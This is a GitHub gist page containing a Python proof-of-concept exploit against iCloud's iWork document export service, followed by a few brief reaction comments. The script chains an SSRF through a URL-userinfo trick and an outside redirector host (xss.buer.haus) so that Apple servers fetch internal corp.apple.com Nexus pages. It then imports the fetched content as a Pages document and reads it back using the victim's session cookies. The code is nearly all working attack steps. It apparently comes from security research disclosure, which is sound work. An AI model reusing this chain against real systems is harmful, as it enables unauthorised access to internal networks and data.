-
-
Save samwcyo/f8387351ce9acb7cffce3f1dd94ce0d6 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests, json | |
cookies = '' | |
clientId = "" | |
dsId = "" | |
def firstStep(url): | |
realUrl = "xss.buer.haus/redir.php?url={}".format(url) | |
r = requests.post("https://p37-iworkexportws.icloud.com/iw/export-ws/10000033657/store_document?build=primary&clientId={}&dsid={}".format(clientId, dsId), data = { | |
"url": "https://p37-mailws.icloud.com:443@{}".format(realUrl), | |
"source": "webmail", | |
"build": "primary" | |
}, headers = { | |
"Content-Type": "application/x-www-form-urlencoded; charset=utf-8", | |
"Origin": "https://www.icloud.com", | |
"Cookie": cookies | |
}) | |
# print r.headers | |
return json.loads(r.text)["job_id"] | |
def secondStep(): | |
r = requests.get("https://p37-docws.icloud.com/ws/com.apple.Pages/list/lookup_by_id?clientId={}&document_id=documents&dsid={}".format(clientId, dsId), data = {}, headers = { | |
"Origin": "https://www.icloud.com", | |
"Cookie": cookies | |
}) | |
# print "Second: {}".format(r.text) | |
def thirdStep(): | |
r = requests.get("https://p37-docws.icloud.com/ws/com.apple.Pages/list/list?clientId={}&concise=true&document_id=documents&dsid={}&fetch_manifests=false&skipErrors=true".format(clientId, dsId), data = {}, headers = { | |
"Origin": "https://www.icloud.com", | |
"Cookie": cookies | |
}) | |
# print "Three: {}".format(r.text.encode("utf8")) | |
def fourthStep(jobId): | |
r = requests.post("https://p37-iworkexportws.icloud.com/iw/export-ws/{}/store_document_status?build=primary&clientId={}&dsid={}&job_id={}".format(dsId, clientId, dsId, jobId), data = {}, headers = { | |
"Origin": "https://www.icloud.com", | |
"Cookie": cookies | |
}) | |
# print "Four: {}".format(r.text) | |
def fifthStep(jobId): | |
r = requests.post("https://p37-iworkexportws.icloud.com/iw/export-ws/{}/move_stored_document?build=primary&clientId={}&dsid={}".format(dsId, clientId, dsId), data = { | |
"job_id": jobId, | |
"name": "text_0%202.txt", | |
"zone": "com.apple.Pages", | |
"parent_id": "documents", | |
"package": "N", | |
"source": "webmail", | |
"build":"primary" | |
}, headers = { | |
"Content-Type": "application/x-www-form-urlencoded; charset=utf-8", | |
"Origin": "https://www.icloud.com", | |
"Cookie": cookies | |
}) | |
# print "Five: {}".format(r.text) | |
def sixthStep(jobId): | |
r = requests.post("https://p37-iworkexportws.icloud.com/iw/export-ws/{}/store_document_status?build=primary&clientId={}&dsid={}&job_id={}".format(dsId, clientId, dsId, jobId), data = {}, headers = { | |
"Content-Type": "text/plain", | |
"Origin": "https://www.icloud.com", | |
"Cookie": cookies | |
}) | |
# print "Six: {}".format(r.text) | |
return r.text | |
def seventhStep(pageId): | |
r = requests.post("https://p37-iwmb.icloud.com/iwmb/pages/import?s=5816&clientId={}&version=1010&clientType=G10.1&clientBuildNumber=10B146".format(clientId), json = { | |
"document_id": "docws:{}:com.apple.Pages:{}".format(dsId, pageId), | |
"language":"en-us", | |
"locale":"en-us", | |
"timezone":"US/Pacific" | |
}, headers = { | |
"Content-Type": "text/plain; charset=utf-8", | |
"Origin": "https://www.icloud.com", | |
"Cookie": cookies | |
}) | |
# print "Seven: {}".format(r.text) | |
return json.loads(r.text) | |
def eigthPage(data, pageId): | |
r = requests.post("https://p37-iwmb.icloud.com/iwmb/pages/create?s=5816&clientId={}&version=1010&clientType=G10.1&clientBuildNumber=10B146".format(clientId), json = { | |
"parent_item_id":"documents", | |
"name":"text_0 2.pages", | |
"bootstrap_source_id": data["bootstrap_source_id"], | |
"bootstrap_source_token": data["bootstrap_source_token"], | |
"delete_import_source_auth_token":"null", | |
"import_source_document_id":"docws:{}:com.apple.Pages:{}".format(dsId, pageId), | |
"is_import": True, | |
"is_open_copy": False, | |
"language":"en-us", | |
"locale":"en-us", | |
"timezone":"US/Pacific", | |
"zone":"com.apple.Pages" | |
}, headers = { | |
"Content-Type": "text/plain; charset=utf-8", | |
"Origin": "https://www.icloud.com", | |
"Cookie": cookies | |
}) | |
# print "Eight: {}".format(r.text) | |
return json.loads(r.text) | |
def ninthPage(data): | |
r = requests.get("https://iwmb.icloud.com/iwmb/pages/n{}/manifest?version=1010&clientType=G10.1&clientBuildNumber=10B146".format(data["item_id"]), headers = { | |
"Origin": "https://www.icloud.com", | |
"Cookie": cookies | |
}) | |
# print "Nine: {}".format(r.text) | |
return json.loads(r.text) | |
def finalPage(data): | |
r = requests.get("https://p37-iwres.icloud.com/iwmb/{}fetchDocument?s=5816&version=1010&clientType=G10.1&clientBuildNumber=10B146".format(data["webservices"]["documentPath"]), headers = { | |
"Origin": "https://www.icloud.com", | |
"Cookie": cookies | |
}) | |
return r.text | |
def find_between( s, first, last ): | |
try: | |
start = s.index( first ) + len( first ) | |
end = s.index( last, start ) | |
return s[start:end] | |
except ValueError: | |
return "" | |
def fetchURL(url): | |
jobId = firstStep(url) | |
secondStep() | |
thirdStep() | |
fourthStep(jobId) | |
fifthStep(jobId) | |
while True: | |
data = sixthStep(jobId) | |
if "uploading" in data: | |
continue | |
pageId = json.loads(data)["result"]["document_id"] | |
break | |
data = seventhStep(pageId) | |
data = eigthPage(data, pageId) | |
data = ninthPage(data) | |
out = finalPage(data).encode("utf8") | |
return out | |
def clean(content): | |
content = content.replace("\\n", "\n") | |
return find_between(content, '<html>', '</html>') | |
# url = "http://redacted.corp.apple.com:1234/nexus/redacted" | |
# url = "http://redacted.corp.apple.com:1234/nexus/redacted" | |
url = "http://redacted.corp.apple.com:1234/nexus/redacted" | |
print clean(fetchURL(url)) |
cheezy
cheesy
Holy
Holy
ok
🤯
cheese
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
cheese